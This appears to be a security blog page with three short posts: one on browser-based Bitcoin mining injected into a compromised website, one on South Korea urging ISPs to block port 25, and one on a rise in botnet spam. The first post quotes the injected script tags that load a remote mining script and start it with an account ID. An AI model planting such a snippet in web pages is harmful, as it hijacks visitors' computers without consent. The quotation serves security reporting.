Bitcoin Mining Coming to a Compromised Web Site Near You

A poster to the Full Disclosure mailing list announced today that he had discovered JavaScript-based Bitcoin mining software on a compromised web site. Here’s the original post for reference:

Group,
Recently I ran across the below on a site:

<script type="text/javascript" src="hxxp://www.bitcoinplus.com/js/miner.js">
</script>
<script type="text/javascript">// <![CDATA[
  BitcoinPlusMiner(10215318);
// ]]></script>

I know the 10215318 represents the bitcoin email, but I was curious if
there was a way to figure out what the email actually was instead of the
number above.  Would be nice to find out what email address may have been
involved in  compromising the site.  Thanks for any help you may be able
to provide.

James

For those who are not in the know about Bitcoin, it suffices to say that Bitcoin provides a way of turning CPU cycles into cash. We’ve known for a while that botnet operators have been deploying Bitcoin mining programs onto compromised PCs. The difference with what’s been discussed today is that the mining happens not through a botnet installation, but rather simply by visiting the web site and running its JavaScript code in your browser (something that is automatic).

For a cybercriminal, the idea of deploying a bit of JavaScript onto a compromised web site and then monetizing millions of spare cycles of CPU time from web site visitors must evoke something close to a religious experience. Is it time for our web browsers to police JavaScript CPU consumption more aggressively?

South Korea to Block Port 25

Last week, according to the BBC, South Korea’s Internet and Security Agency began encouraging ISPs to block port 25 to limit the quantity of botnet spam emanating from the country. South Korea has long had a reputation as a haven for botnet spam, most likely because of the large number of Internet users in the country, and the extremely high quality and low cost of their broadband access. The recommendation to block port 25 will probably improve things in South Korea, if the ISPs get around to implementing this change. I’m not sure how influential the regulator is in that country, but if it’s like other developed countries, the ISPs are likely to drag their feet to avoid affecting users negatively.

Tags: block, korea, outbound spam

Botnet spam ticks up in August

After a very quiet summer, it seems that the spam bots have awakened. We recently noticed a spike in blacklistings; after checking the usual data sources, it seems the spike is widespread and indicative of one or more spambot networks getting back into action. The graph above is from the CBL (source: cbl.abuseat.org), which is one of the world’s better botnet blacklists.

Is this another “back to school special” as we have seen in previous years, where the spammers go to sleep over the summer, only to turn their machines back on in time for mom and dad to come home from vacation (and start buying pills)?

Still, despite the recent uptick, botnet spam volume is still well below the peak in early 2010, which was as much as 6 times higher than present volumes.